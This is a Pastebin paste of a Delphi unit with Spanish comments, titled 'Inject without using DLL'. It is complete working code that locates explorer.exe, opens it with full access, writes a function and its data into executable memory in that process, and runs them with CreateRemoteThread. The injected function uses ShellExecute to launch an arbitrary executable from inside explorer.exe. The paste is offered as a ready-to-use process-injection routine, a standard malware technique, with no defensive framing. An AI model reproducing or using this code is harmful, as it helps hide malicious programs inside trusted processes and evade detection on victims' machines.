appo

Inject without using DLL

Dec 27th, 2013
557
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  //******************************************************************************
  2. //* UNIT:        UNT_InjectNoDLL
  3. //* AUTOR:        Fakedo0r
  4. //******************************************************************************
  5. Unit UNT_InjectNoDLL;
  6. //******************************************************************************
  7. //DECLARACION DE LIBRERIAS / CLASES
  8. //******************************************************************************
  9. Interface
  10.  
  11. Uses
  12.   Winapi.Windows, TLHelp32, PsAPI, ShellAPI;
  13. //******************************************************************************
  14. //DECLARACION DE ESTRUCTURAS
  15. //******************************************************************************
  16. Type
  17.   PTINJECT = ^TINJECT;
  18.  
  19.   TINJECT = Record
  20.     __ShellExecute: Function(HWND: HWND; Operation, FileName, Parameters,
  21.       Directory: PWideChar; ShowCmd: Integer): HINST; Stdcall;
  22.  
  23.     cExe: Array [0 .. MAX_PATH] Of Char;
  24.     cOper: Array [0 .. MAX_PATH] Of Char;
  25.   End;
  26. //******************************************************************************
  27. //DECLARACION DE FUNCIONES / PROCEDIMIENTOS
  28. //******************************************************************************
  29. Procedure Inyectada(tInj: PTINJECT); Stdcall;
  30. Procedure Inyectora;
  31. Function AllocAndCopyMem(hProcess: THandle; ptBuffer: Pointer;
  32.   iBuffSize: Int64): Pointer;
  33. //******************************************************************************
  34. Implementation
  35. //******************************************************************************
  36. //<--- LA FUNCION QUE VAMOS A INYECTAR --->
  37. //******************************************************************************
  38. Procedure Inyectada(tInj: PTINJECT); Stdcall;
  39. Begin
  40.   tInj.__ShellExecute(0, tInj.cOper, tInj.cExe, Nil, Nil, 1);
  41. End;
  42. //******************************************************************************
  43. //<--- LA FUNCION QUE OPERA LA INYECCION --->
  44. //******************************************************************************
  45. Procedure Inyectora;
  46. Var
  47.   uTamFun:    UINT;
  48.   dwPID:      DWORD;
  49.   dwExitCode: DWORD;
  50.   hThread:    THandle;
  51.   hProcess:  THandle;
  52.   ptStruct:  Pointer;
  53.   ptEsp:      Pointer;
  54.   tProcEntry: TProcessEntry32;
  55.   tInj:      TINJECT;
  56. Begin
  57.   uTamFun := 0;
  58.   dwExitCode := 0;
  59.   hProcess := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  60.   tProcEntry.dwSize := Sizeof(tProcEntry);
  61.  
  62.   If Process32First(hProcess, tProcEntry) Then
  63.   Begin
  64.     Repeat
  65.       If tProcEntry.szExeFile = 'explorer.exe' Then
  66.       Begin
  67.         dwPID := tProcEntry.th32ProcessID;
  68.         Break;
  69.       End;
  70.     Until Not Process32Next(hProcess, tProcEntry);
  71.   End;
  72.  
  73.   CloseHandle(hProcess);
  74.  
  75.   // obtenemos el handle del proceso
  76.   hProcess := OpenProcess(PROCESS_ALL_ACCESS, False, dwPID);
  77.  
  78.   // obtenemos el puntero del api
  79.   @tInj.__ShellExecute := GetProcAddress(LoadLibrary('Shell32.dll'),
  80.     'ShellExecuteW');
  81.  
  82.   // copiamos los datos en las variables
  83.   lstrcpy(tInj.cExe, PChar('D:\1.exe'));
  84.   lstrcpy(tInj.cOper, PChar('open'));
  85.  
  86.   // reservamos y copiamos nuestra estructura a la memoria
  87.   ptStruct := AllocAndCopyMem(hProcess, @tInj, Sizeof(TINJECT));
  88.  
  89.   // calculamos el tamaño de nuestra funcion
  90.   uTamFun := UINT(@Inyectora) - UINT(@Inyectada);
  91.  
  92.   // reservamos y copiamos nuestra funcion a la memoria
  93.   ptEsp := AllocAndCopyMem(hProcess, @Inyectada, uTamFun);
  94.  
  95.   // creamos el hilo remoto
  96.   hThread := CreateRemoteThread(hProcess, Nil, 0, ptEsp, ptStruct, 0,
  97.     PDWORD(Nil)^);
  98.  
  99.   If hThread <> 0 Then
  100.   Begin
  101.     // esperamos hasta que se cree el hilo
  102.     WaitForSingleObject(hThread, INFINITE);
  103.     // obtenemos el estado de terminacion del hilo
  104.     GetExitCodeThread(hThread, dwExitCode);
  105.     // liberamos el handle del hilo creado
  106.     CloseHandle(hThread);
  107.     // liberamos el espacio en el proceso
  108.     VirtualFreeEx(hProcess, ptStruct, 0, MEM_RELEASE);
  109.     VirtualFreeEx(hProcess, ptEsp, 0, MEM_RELEASE);
  110.   End;
  111.  
  112.   // liberamos el handle del proceso
  113.   CloseHandle(hProcess);
  114. End;
  115. //******************************************************************************
  116. //<--- RESERVA ESPACIO Y ESCRIBE EN LA MEMORIA --->
  117. //******************************************************************************
  118. Function AllocAndCopyMem(hProcess: THandle; ptBuffer: Pointer;
  119.   iBuffSize: Int64): Pointer;
  120. Var
  121.   iBytesWritten: SIZE_T;
  122. Begin
  123.   iBytesWritten := 0;
  124.   // reservamos espacio
  125.   Result := VirtualAllocEx(hProcess, Nil, iBuffSize, MEM_COMMIT Or MEM_RESERVE,
  126.     PAGE_EXECUTE_READWRITE);
  127.   // escribimos
  128.   WriteProcessMemory(hProcess, Result, ptBuffer, iBuffSize, iBytesWritten);
  129. End;
  130. End.
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×